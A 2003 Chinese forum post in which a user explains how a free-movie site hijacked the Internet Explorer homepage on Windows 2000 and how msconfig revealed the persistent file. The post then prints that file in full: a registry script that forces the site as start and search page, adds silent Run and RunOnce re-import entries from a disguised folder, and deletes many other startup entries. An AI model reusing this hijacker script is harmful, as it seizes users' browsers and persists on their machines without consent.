注册表文件被修改问题的完美解决实例！

wizard0128 2003-10-20 09:39:23

一个星期前无聊中上www.11311.com网站看免费电影，结果注册表文件被修改，，我的系统是windows2k,登陆首页变成了www.11311.com，从此麻烦开始了。历尽折腾，最终终于搞定，虽然这是一个不起眼的问题，但是却是一个烦人的问题，特别是对于初学者，不敢独享，于是把这个问题解决的体会写出来，希望对大家有所帮助。
第一个回合，把注册表中出现www.11311.com的键值，全部删掉，以为可以搞顶了，结果重新启动后，依然如此，看以下注册表，被删掉的键值有出现了，-----郁闷中啊
第二个回合，万般无奈中求助于网上形形色色的什么注册表修复工具（本人一向讨厌类似的工具，不要打我哦-------个人喜好而已 ^_^^_^^_^）。我使用了3721网络实名工具，结果还是不了了之，－－－－－极度郁闷中啊
第三个回合，记得我以前使用过winxp版本的msconfig工具（win2k系统没有），于是没有办法的办法中，我把xp版本中的msconfig工具拷贝倒win2k系统下面，看看能不能正常使用，（因为我觉得windows系列系统的内核差不多都是一样的，这个办法具有理论上的可行性）结果－－－－－－－－－－－－－－可行，万岁万岁万岁！！！
结局：当然了，顺利成章的看到在“msconfig系统配置使用程序”窗口的“启动”选项卡有一个选项为：SYSTEM ，目录为：c:\$NtUninstallQ887678$\system.cer
，于是找到该system.cer文件，打开一看，果然就是他。喜悦之情，就不用说了。第一个想法，就是赶紧把他给删掉。当然了，别忘了备份哦，万一删错了怎么办啊？？：）
后记，其实当我看到这个文件时，真的很吃惊，大家都是学计算机的，短短的十几行代码就能有如此的效果，一股好奇心里驱使着我好好的把这个vbsript文件仔细的研究了一下，收获还是挺多的。
下面我把这个文件贴出来

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.11311.com"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.11311.com"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://www.11311.com"
"Default_Search_URL"="http://www.11311.com"
"Search Bar"="http://www.11311.com"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.11311.com"
"First Home Page"="http://www.11311.com"
"Default_Search_URL"="http://www.11311.com"
"Search Page"="http://www.11311.com"
"Search Bar"="http://www.11311.com"
"Local Page"="http://www.11311.com"

[-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
@="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://www.11311.com"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://www.11311.com"
"Search Page"="http://www.11311.com"
"Search Bar"="http://www.11311.com"
"SearchURL"="http://www.11311.com"
"Start Page"="http://www.11311.com"
"First Home Page"="http://www.11311.com"
"Default_Page_URL"="http://www.11311.com"
"Local Page"="http://www.11311.com"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WlN32"="C:\\$NtUninstallQ887678$\\WINSYS.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WlN32"="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
应该说这个文件很典型，算个良性病毒，具有隐藏性，可传播性。

哎呀，打的手都累了，哈哈，就这样结束把。

原创：wizard0128
2003/10/19
如有转载请注明出处，谢谢合作！

...全文